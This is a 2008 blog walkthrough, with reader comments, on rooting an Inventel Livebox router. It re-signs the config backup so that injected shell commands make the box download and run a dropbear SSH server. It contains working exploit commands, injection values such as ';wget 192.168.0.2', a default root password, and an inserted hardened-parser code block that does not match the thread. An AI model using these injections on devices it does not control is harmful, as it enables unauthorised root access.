got root ?
Thanks to xtof and Andy Potter, here’s a walkthrough to install the dropbear ssh server on the inventel livebox.
You just need a *nix box with a webserver, connected to the livebox via ethernet.
It was tested on v5.10.7-fr and should not brick your livebox, but use at your own risk.
First, we must drop some files on our local webserver for the livebox to download later.
sudo wget http://www.andyp.uwclub.net/dropbearmulti
sudo wget http://www.andyp.uwclub.net/dropbear_server
#we change the dropbear executable location as we can’t write to /bin on the livebox
sudo sed -i -e s#/bin/drop#/etc/mystuff/drop# dropbear_server
Then download the cfgsave.dwb file from the livebox into some folder and cd there.
wget http://www.agp.dsl.pipex.com/files/cfg_unhide.c
wget http://www.agp.dsl.pipex.com/files/cfg_hide.c
gcc cfg_unhide.c -o unhide
gcc cfg_hide.c -o hide
#we extract the cfgsave.dwb contents
dd if=cfgsave.dwb bs=36 skip=1 | ./unhide | tar -x
wget http://jean.thecoderblogs.com/files/2008/12/dropbear.txt
Now open dropbear.txt in your favorite text editor and set the MYIP variable to the IP address of your webserver. This script will be run by your livebox, so double check it before moving on.
sudo chown -R root:root etc usr
tar -c etc/* usr/* > cfgsave.tar
echo AVfqQReAOR1KYw== | base64 -d > md5salt
(cat cfgsave.tar md5salt | md5sum -t && cat cfgsave.tar) | ./hide > new.dwb
Now you can upload the new.dwb file to your livebox. While the livebox reboots, you can check that it runs your modified bluedsl.conf by looking at your webserver log.
tail -F /var/log/apache2/access.log
When the livebox has successfully downloaded dropbearmulti and dropbear_server, wait a bit while the DSS and RSA keys are generated and then just run:
ssh root@configuration.adsl
Dropbear will be started automatically at each boot, so you can restore your original cfgsave.dwb file.
Enjoy !
December 13th, 2008 at 5:04 pm
Hi !
I have tried to apply this walkthrough but got stuck when uploading the file back to the box ("Incorrect configuration file").
Is there a trick with the md5salt file when generating the new dwb file?
Anyway, thanks for the good work!
Regards
Marc
December 13th, 2008 at 5:43 pm
are you using cygwin ?
anyway, can you check that the md5salt file is 10 bytes long (wc -c md5salt) and then try this command instead to generate the new.dwb :
(cat cfgsave.tar md5salt | md5sum -t && cat cfgsave.tar) | ./hide > new.dwb
December 14th, 2008 at 9:00 pm
Glad to see progress on getting root access to a standard firmware.
I’m currently still trying to get the latest source code from Thomson/Orange but its proving difficult. Until we can compile our own, this is the best way to go.
My old web site (www.agp.dsl.pipex.com) could disappear at any day but the uwclub.net one should be around for a bit longer.
December 18th, 2008 at 3:29 pm
I have tried this on my Spanish v5.10.3-sp, which is the current Spanish version, and it didn't work.
The system recognized the new config and wrote it without problems; in fact I downloaded the config file again and the modified bluedsl.conf was there, but it seems it didn't do a thing on boot.
Any idea on what I can take a look at?
Thanks in advance.
December 18th, 2008 at 6:40 pm
As I saw that the script is not being run I did some tests and got weird results, they are parsing the parameters in a weird way, having this on the config:
DHCP_START=";wget 192.168.0.2"
DHCP_STOP=$(cat /etc/firm.conf)
and got this on the web:
Dirección inicial del servidor DHCP ;wget 192.168.0.$(cat /etc/firm.192.168.0.1
Dirección final del servidor DHCP $(cat /etc/firm.192.168.0.1
Weird thing is where does that 192.168.0.1 come from (that is my livebox’s address) and that the start address includes part of the string from the stop address.
But it doesn’t seem to execute anything.
Ideas?
December 18th, 2008 at 9:24 pm
do you have a decrypted copy of your current firmware ?
i’m short on ideas, but here’s what i found out so far on the subject:
the readconf function parses the .conf files like this:
eval "$VAR='$( conf_get_str $RCONFFILE $VAR )'"
conf_get_str is a program (not a shell script) whose purpose is to unescape the variables values (not sure on the details).
conf_get_nstr is the same binary, but when run by that name, it does an additional "anti-injection" regex check on "([^;]*);([^;]*)", but I haven't figured out yet what it does in case of a match.
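As an added example (not the livebox's own code), here is the readconf eval pattern quoted above placed next to a hardened reader that validates the variable name and assigns the value without ever parsing it as shell; conf_get_str is a hypothetical stand-in for the livebox binary and the sample config is constructed.

```shell
# Added example, not the livebox's own code: the eval-based readconf
# pattern quoted above next to an assignment that never evaluates the
# value as shell code. conf_get_str is a hypothetical stand-in for the
# livebox binary: it prints the raw value of VAR from a KEY=value file.
conf_get_str() {
    # $1 = config file, $2 = variable name
    sed -n "s/^$2=//p" "$1" | head -n 1
}

# Unsafe: the value is spliced into the text that eval parses, so a
# single quote inside it closes the string and the rest runs as code.
readconf_unsafe() {
    RCONFFILE=$1; VAR=$2
    eval "$VAR='$( conf_get_str $RCONFFILE $VAR )'"
}

# Hardened: reject anything that is not an identifier-shaped name, then
# let eval see only "NAME=$val"; the value is expanded, never parsed.
readconf_safe() {
    RCONFFILE=$1; VAR=$2
    case $VAR in
        ''|[0-9]*|*[!A-Za-z0-9_]*) return 1 ;;
    esac
    val=$(conf_get_str "$RCONFFILE" "$VAR")
    eval "$VAR=\$val"
}

# Constructed sample config (not a real bluedsl.conf): the first value
# carries a quote and sets MARK so any stray execution is visible.
write_sample_conf() {
    printf '%s\n' "DHCP_START=';MARK=hit;:'" \
                  "DHCP_STOP=192.168.1.100" > "$1"
}

SAMPLE=${TMPDIR:-/tmp}/sample_bluedsl.conf
write_sample_conf "$SAMPLE"
MARK=unset
readconf_safe "$SAMPLE" DHCP_START
echo "safe:   MARK=$MARK DHCP_START=$DHCP_START"
readconf_unsafe "$SAMPLE" DHCP_START
echo "unsafe: MARK=$MARK DHCP_START=$DHCP_START"
rm -f "$SAMPLE"
```

The safe reader keeps the quote-bearing value as a literal string and leaves MARK untouched, while the eval pattern runs the embedded assignment and loses the value.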
December 19th, 2008 at 11:51 pm
If by decrypted you mean a firmware split with dwbtool into the install_script and the cramfs_image, nope, what I have is 5.08.3-sp (came on the cd) and dwbtool is not able to open it, so I don’t know what to look at.
It really seems weird to me that v5.10.7-fr is supposed to be more advanced than my v5.10.3-sp, so it doesn’t make sense that -fr (newer) is vulnerable while -sp (older) isn’t.
I think I may be able to get an older firmware (maybe supported by dwbtool), but don’t know if this would help at all or how could it help.
December 20th, 2008 at 12:35 am
I got an old 5.03.2-sp from a guy's website and could get the cramfs out of it. In that version things seem to be like you say. After seeing that code I still can't understand how it can work for you with the -fr, I mean... how can eval "$VAR='$( conf_get_str $RCONFFILE $VAR )'" execute the code you append to the config file?
Could you explain this to me?
January 20th, 2009 at 5:07 pm
Where can I get the v5.10.7-fr firmware? Can somebody send it? (you can use http://drop.io for example) Does this firmware exist in a UK version?
January 22nd, 2009 at 9:31 pm
Thanks to Andy I’m running now v5.08.15-2-fr. Now I’m trying to use this method for ssh access but all I get is the error “incorrect configuration file” trying to upload the hacked configuration file.
In my firmware the files in the cfg file are not in the etc/ and usr/ directories like in your firmware. I changed this and the files are the same in the hacked cfg. But it seems my firmware must be using a different salt for the heading of the file.
How can I find this salt (like AVfqQReAOR1KYw== in your firmware)? If it helps I can send you the websvr binary. A quick strings on this binary shows this:
md5sum > /var/tmp/cfgsave.dwb.md5sum
/var/tmp/cfgsave.tar
/var/tmp/cfgsave.dwb.md5sum
/var/tmp/cfgsave.dwb
Erreur, impossible d’ouvrir md5sum
Erreur, impossible de lire la signature qui vient d’etre ecrite
tar -c -f /var/tmp/cfgsave.tar -C /etc adsld.conf adv_firewall.conf bluedsl.conf dyndns.conf port_forward.conf sec_level.conf tdte.conf udhcpd.conf vc.conf wifi.conf issue.bluedsl hotspotupLoadCfg
January 22nd, 2009 at 10:43 pm
@blue
i really don’t know, sorry
@Ernest
the cfgsave.dwb file is generated like this
http://jean.pastebin.com/f6a47e9af
so you can’t find the salt by looking at the strings
(the base64 string is just a fancy way to generate the signature in one shell command without non-ASCII characters). I'll try to look at your websvr binary to see if it's different.
January 23rd, 2009 at 6:55 pm
Thanks for your answer Jean. I've finally succeeded in hacking the cfgsave.dwb file; the problem was I was not including the "issue.bluedsl" file that contains the firmware version.
I’ve downloaded again the cfgsave.dwb from the web admin and the hack is there but it’s not executing. Looking at my firmware (v5.08.15-2-fr) it seems the bluedsl.conf file is not executed:
# grep '^\..*\.conf' loop/etc_ro_fs/rc*/* | grep -v autoconf
# grep '^\..*\.conf' loop2/etc_ro_fs/rc*/* | grep -v autoconf
loop2/etc_ro_fs/rc2.d/K50mdg:. /usr/etc/mdg.conf
loop2/etc_ro_fs/rc3.d/K50mdg:. /usr/etc/mdg.conf
It seems the only executed file is /usr/etc/mdg.conf but it's not included in the cfgsave.dwb file, too bad.
I wonder how this worked in your livebox, it’s an Inventel Livebox or a Livebox pro?
Any ideas about how to get telnet/ssh access to this firmware (without a serial cable)?
January 27th, 2009 at 2:26 pm
Does anyone have a copy of v5.10.7-fr.dwb or v5.10.7-en.dwb or anything later than 5.08.15 ? I am trying to help a couple of people upgrade from v5.08.15-2 to v5.10.7 or so but need the firmware in a dwb file as they do not have JTAG or serial access to the Livebox.
February 6th, 2009 at 4:25 pm
Hi,
thanks for the great work,
I live in Morocco and I bought 2 dwb200 routers and an Inventel livebox from a flea market; one dwb200 is from Wanadoo-Spain and is working great, the other dwb200 is from Wanadoo-France and when I plug it on the line it says "synchronizing..." but nothing after a long time, same thing for the livebox!!!
please is there a bricked firmware to upload or do i have to install linux to do all the steps to unlock the machines?
thanks
February 9th, 2009 at 12:20 am
Hello
Thank you for that. I just have a problem when I run:
lardet@lardet-desktop:~/lbox$ dd if=cfgsave.dwb bs=36 skip=1 | ./unhide | tar -x
I have this message :
412+1 enregistrements lus
412+1 enregistrements écrits
14848 octets (15 kB) copiés, 0,00499317 s, 3,0 MB/s
tar: etc/udhcpd.conf : l’horodatage 1970-01-01 01:00:00 est trop vieux pour être plausible
tar: etc/dyndns.conf : l’horodatage 1970-01-01 01:00:00 est trop vieux pour être plausible
Do you know if it's a problem? I don't understand; my new.dwb size is:
20,0 Kio (20516 octets)
Thanks
February 9th, 2009 at 9:23 am
@Hadoo, you can find some firmwares at these websites:
http://dbzoo.com/wiki/livebox/livebox
http://gpl-inside.wikia.com/wiki/LiveBox
February 9th, 2009 at 9:57 pm
@Mickael there's nothing wrong with "1970-01-01 01:00:00" and the new dwb is larger because we add some shell commands
February 11th, 2009 at 7:21 pm
Ok, it's just that I wouldn't want to brick my livebox.
And the file size is just small; with a complete firmware, I was thinking before that the livebox saves the config and the firmware in the same *.dwb.
Thanks, I'll try to flash my livebox with Ubuntu.
February 15th, 2009 at 5:53 pm
Ok great! I can connect with PuTTY on Windows and with Konsole on Linux, but with WinSCP (Windows) I can only connect with error 127 for SCP and not SFTP; FileZilla and SmartFTP won't connect, and on Linux gFTP does not connect.
Do you know a graphical program to connect with, or am I not using the software correctly?
If possible please; PuTTY works great but I prefer a graphical program.
Thanks
February 15th, 2009 at 9:33 pm
dropbear (the ssh server) does not support sftp by itself, and for scp you need the scp binary on the livebox. i’ll post the scp binary once i manage to recompile it. thanks for your feedback.
February 26th, 2009 at 10:16 pm
Hello,
All the steps went well. I could see the two files being downloaded, a sign that the procedure ran to the end.
However, I still get a connection refused from ssh when I try to connect to the box.
Would you know what could be wrong?
Thanks in advance.
February 27th, 2009 at 12:54 pm
danifty
Are you on Linux or Windows?
If you are on Linux, open a terminal and type:
ssh root@configuration.adsl
or
ssh root@192.168.1.1
Password : livebox
On Windows use PuTTY:
Host name or IP:
configuration.adsl
or
192.168.1.1
Port : 22
SSH
Open
Login as : root
Password : livebox
What refusal from SSH? An error?
For more info, and in French, you can go here:
http://www.livebox.asso.fr/forum/viewtopic.php?f=12&t=17775
February 27th, 2009 at 9:07 pm
@danifty
I don't really know; if the 2 files were downloaded and the path in dropbear_server is right (/etc/mystuff/dropbear instead of /bin/dropbear), it should have started.
I'll try to come up with a simpler method that also lets you see the output of the injected shell commands.
February 28th, 2009 at 12:07 am
I didn't know French was possible, that suits me.
As for the method, if you are on Linux it's very easy, at least from what I know: do a little search to install the server, do a test to see whether the files show up, find the PC's IP, etc.
On Ubuntu, at least with a Gnome interface, it's very simple; on KDE, which I preferred before, less so. On Windows I didn't manage even by emulating Linux.
In short, the tutorial on Linux is very good, even if installing the server isn't explained, because I think whoever does this kind of manipulation is able to go look up that info
... which I did (PS: it took me a while to figure out that the PC's IP address was my own PC's).
I read that SCP on Dropbear is for now only in development because there are bugs and it's hard to do; anyway I'll leave that to the pros.
Excuse my French, but it's already not my strong point, let alone English.
Thanks for this blog Jean.